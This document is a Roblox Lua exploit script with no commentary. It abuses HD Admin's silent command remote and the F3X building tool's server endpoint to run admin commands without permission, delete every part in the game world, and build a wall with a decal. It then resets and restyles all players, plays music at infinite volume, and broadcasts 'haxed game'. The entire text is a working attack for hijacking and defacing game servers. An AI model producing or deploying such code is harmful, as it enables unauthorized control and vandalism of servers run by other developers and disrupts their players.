local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent RequestCommand:InvokeServer(";punish all") RequestCommand:InvokeServer(";btools me") RequestCommand:InvokeServer(";time 11") local player = game.Players.LocalPlayer local char = player.Character or player.CharacterAdded:Wait() local backpack = player:WaitForChild("Backpack") local function getf3x() for _,v in ipairs(backpack:GetChildren()) do if v:FindFirstChild("SyncAPI") then return v end end for _,v in ipairs(char:GetChildren()) do if v:FindFirstChild("SyncAPI") then return v end end end local f3x = getf3x() if not f3x then return end local serverendpoint = f3x.SyncAPI.ServerEndpoint local function remove(p) serverendpoint:InvokeServer("Remove",{p}) end for _,v in ipairs(workspace:GetDescendants()) do if v:IsA("BasePart") and not v:IsAncestorOf(char) then task.spawn(function() pcall(function() remove(v) end) end) end end task.wait(0.6) local function newPart(cf,size,color,decal) local p = serverendpoint:InvokeServer("CreatePart","Normal",cf,workspace) serverendpoint:InvokeServer("SyncResize",{{Part=p,Size=size,CFrame=cf}}) serverendpoint:InvokeServer("SyncColor",{{Part=p,Color=color,UnionColoring=false}}) serverendpoint:InvokeServer("SyncMaterial",{{Part=p,Material=Enum.Material.Concrete,Transparency=0}}) serverendpoint:InvokeServer("SyncAnchor",{{Part=p,Anchored=true}}) if decal then serverendpoint:InvokeServer("CreateTextures",{{Part=p,Face=Enum.NormalId.Front,TextureType="Decal"}}) serverendpoint:InvokeServer("SyncTexture",{{Part=p,Face=Enum.NormalId.Front,TextureType="Decal",Texture="rbxassetid://"..decal}}) end return p end local BASE_CF = char.HumanoidRootPart.CFrame * CFrame.new(0, -5, -40) newPart(BASE_CF, Vector3.new(120, 5, 120), Color3.fromRGB(100, 100, 100), nil) newPart(BASE_CF * CFrame.new(0, 30, 58), Vector3.new(120, 60, 4), Color3.fromRGB(80, 80, 80), "104343944421649") RequestCommand:InvokeServer(";re all") RequestCommand:InvokeServer(";char all wdafvadbawd_alt") RequestCommand:InvokeServer(";music 108781528188731 ;volume inf") RequestCommand:InvokeServer(";sm wdafvadbawd_alt haxed game") RequestCommand:InvokeServer(";sh wdafvadbawd_alt haxed game")